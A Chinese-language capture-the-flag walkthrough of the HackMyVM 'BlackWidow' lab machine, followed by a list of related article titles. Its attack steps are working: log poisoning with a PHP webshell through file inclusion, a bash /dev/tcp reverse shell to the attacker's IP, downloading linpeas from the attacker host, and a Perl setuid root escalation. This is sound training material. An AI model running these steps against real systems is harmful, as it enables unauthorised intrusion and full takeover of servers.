部署环境

提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可

kali攻击机ip地址:桥接自动获取ip,此次中间换过一次IP,没有什么影响

靶机ip地址:(桥接自动获取ip)

目标: user.txt和root.txt

信息收集

扫描主机

 arp-scan -l


发现存活主机ip地址:192.168.1.118

扫描端口

扫描靶机开放的服务端口

nmap -A -T4 -p- 192.168.1.118


在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进行突破看一下

Web渗透

访问一下80端口界面
发现没有什么有用的信息,直接进行目录扫描看一下
然后就直接访问company/index.html界面进行查看

http://192.168.1.118/company/index.html在这个界面里没有发现什么有用的信息,那就直接看一下源码

正在开发使用file做为参数的php包含方法,那就好办了,我们直接试试
发现其实还是不行,再仔细看看源码有什么遗漏的地方
是不是需要添加完域名才可以,我们先去添加一下试试

vi /etc/hosts


但是扫描的时候发现就发现了一个index.html目录,剩下的网页没有发现,是不是我扫描器的原因,没有扫描完全,那就试试别的扫描器吧,也在这里给大家介绍一个更加完美的扫描软件

Gobuster

Gobuster是Kali Linux默认安装的一款暴力扫描工具。它是使用Go语言编写的命令行工具,具备优异的执行效率和并发性能。该工具支持对子域名和Web目录进行基于字典的暴力扫描。不同于其他工具,该工具支持同时多扩展名破解,适合采用多种后台技术的网站。实施子域名扫描时,该工具支持泛域名扫描,并允许用户强制继续扫描,以应对泛域名解析带来的影响。

-P string:基本AUTH的密码(仅为DIR模式)
-U string:基本AUTH的用户名(仅为DIR模式)
-a string:设置用户代理字符串(DIR模式)
-c string:用于请求的Cookie(仅为DIR模式)
-cn:显示CNNEX记录(DNS模式),不能与“-I”选项一起使用)
-e:扩展模式,打印完整URL
-f:向每个目录请求追加前斜线(仅为DIR模式)
-fw:当通配符发现时,强制继续操作
-i:显示IP地址(仅DNS模式)
-k:跳过SSL证书验证
-l:包括在输出中的主体长度(仅为DIR模式)
-m string:目录/文件模式(DIR)或DNS模式(DNS)(默认“DIR”)
-n:不要打印状态代码
-np:不显示进度
-o string:输出文件以写入结果(默认为STDUT)
-p string:用于请求的代理[http(s)://主机:端口](仅dir模式)
-q:不要打印横幅和其他噪音
-r:追随重定向
-s string:设置状态码(DIR模式)(默认"200,204,301,302,307,403")
-t int:并发线程数(默认值10)
-to duration:HTTP超时(仅限于DIR模式)(默认10s)
-u string:目标URL或域
-v:冗长输出(错误)
-w string:暴力猜解的单词列表的路径
-x string:要搜索的文件扩展(仅限于DIR模式)
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.118/company  -x php,txt,html


在这里终于发现了一个新的目录
那么看一下这个目录进行文件读取看看可以不
发现viper用户,继续收集敏感信息,nmap扫描时显示中间件为apache我们找找日志

http://192.168.1.7/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log


这里的信息一看就知道是agaent头信息,可以修改agent写入一句话木马,再通过文件包含执行命令

curl -A '<?php system($_GET[shell]); ?>' http://blackwidow/

反弹监听

http://192.168.1.7/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=id

写入成功,修改payload反弹shell到攻击机上

1、攻击机监听4444端口

nc -lvvp 4444

2、反弹shell,payload部分需要url编码

编码前

http://192.168.1.7/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=bash -c 'bash -i >& /dev/tcp/192.168.1.6/4444 0>&1'

编码后

http://192.168.1.7/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f192.168.1.6%2f4444%200%3e%261'


反弹成功,找找敏感信息

cd /var/backups(这是备份文件)
ls
cat auth.log


然后在这里就找到了一个密码(累死我了,找半天,一个一个瞅的)

找到viper的密码,登录SSH验证

ssh viper@192.168.1.7


登录成功,继续查找敏感信息。

cd /home/viper
ls
cat local.txt


在这类就拿到flag文件local.txt,上传辅助脚本检查( 这个脚本非常厉害,可以枚举linux操作系统几乎所有的可提权项,甚至可以通过su暴力破解本地密码,输出非常多。)

1。攻击机上辅助脚本目录下开启HTTP服务

python3 -m http.server


2、靶机下载linpeas.sh并执行(靶机上没有wget,使用curl)

curl http://192.168.1.6:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

找到arsenic文件有CAP_SETUID能力,看看他有什么功能

cd backup_site/assets/vendor/weapon/
./arsenic -h

是perl程序,来看看如何提权

提权

https://gtfobins.github.io/gtfobins/perl/#capabilities

知道如何提权,来验证一下

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

提权成功,找一下flag

cd /root
ls
cat root.txt


整个靶场over

渗透靶场——HackMyVM:BlackWidow相关推荐

  1. [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  2. 记录渗透靶场实战【网络安全】

    第一次写靶场实战的文章,有不足之处还请多多指教.本次实战的靶场是红日安全vulnstack系列的第二个靶场. 靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/ ...

  3. 红队渗透靶场之W1R3S靶场(超详细!)

    W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...

  4. 红队渗透靶场之SickOs1.1

    靶场考察知识 shellshock漏洞 shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的 ...

  5. 红队渗透靶场之prime1.0(超详细!)

    靶场考察知识 Wordpress WordPress是一个免费的开源内容管理系统(CMS),可以用来创建和管理网站或博客.它是由PHP语言和MySQL数据库构建的,并且拥有大量的插件和主题,可以让您轻 ...

  6. 内网渗透靶场 Vulnstack(一)

    虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...

  7. 渗透靶场之W1R3S

    目录 W1R3S涉及知识点 靶场下载以及环境配置 渗透过程 信息收集阶段 1.扫描存活主机 2.端口扫描 服务渗透 1.FTP 2.目录爆破 web渗透阶段 创建网站 CMS漏洞利用 CMS漏洞利用信 ...

  8. CH4INRULZ_v1.0.1内网渗透靶场

    nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通 ...

  9. 完整的渗透测试靶场通关

    完整的渗透测试实例 作者:Slaine 编辑日期:2021.6.6 流程目录 前言 记得在2021年初就通关的这个的内网渗透靶场,只不过做完很久都后没怎么管,然后就去某CTF站刷了好一阵子题,排名从两 ...

最新文章

  1. CTreeCtrl鼠标双击响应函数中怎么知道双击的是哪个子项?
  2. ubuntu16.04装MatConvNet
  3. Android 动画以view中心点旋转动画
  4. Android Button字母自动全部大写的问题
  5. python全栈开发_day20_加密模块和excel操作模块以及xml
  6. matlab电机系统建模与仿真软件下载,同步电机模型的MATLAB仿真的设计(最终版)...
  7. Makefile 的解读(一)
  8. 数值算法 —— 邻接元素操作(adjacent_difference)
  9. 写一篇关于堆焊耐磨管道(济南韶欣生产的一种堆焊复合耐磨钢管,用于输送渣料承受高磨损和冲击的耐磨管道,还有耐磨弯头和三通等产品),不要用广告违禁词和极限词,不少于500字,并写出标题...
  10. 西门子1200PLC与V90伺服驱动器 TO控制模式(即工艺对象的方式))
  11. SAP VK13 提示 内部错误:T IVAKE F IVAKE_INSERT I MV130F0I
  12. Python数学问题16:百钱买百鸡
  13. ROS系统MoveIt玩转双臂机器人系列(三)--利用controller控制实际机器人
  14. 银河麒麟系统中的串口调试
  15. epic怎么添加本地游戏_Epic游戏商城本周免费游戏:无主之地 帅杰克合集
  16. xlslib生成excel文件
  17. 设计模式-工厂设计模式
  18. nacos 单机启动命令
  19. 《从偶然到必然 华为研发投资管理与实践》学习总结 第一章 IPD的价值
  20. 2022北京健康博览会,北京健康展览会,北京健康产品交易会

热门文章

  1. 斐波拉契数列 Java三种实现
  2. 消费者洞察:数据影响消费,消费营造数据
  3. 数据技术嘉年华专列10月28日抵达广州,请做好接站准备
  4. 2022年起重机械指挥考试题及模拟考试
  5. 英语学习笔记(二)语法
  6. Substrate 基础教程(Tutorials) -- 模拟网络 添加可信节点
  7. 全国大学的戏精,都在论文致谢里了
  8. 用keil语言定义c51,51单片机Keil C51的使用(C语言)
  9. gensim corpora的简单使用
  10. 鲁棒优化入门(4)-两阶段鲁棒优化及行列生成算法(CCG)超详细讲解(附matlab代码)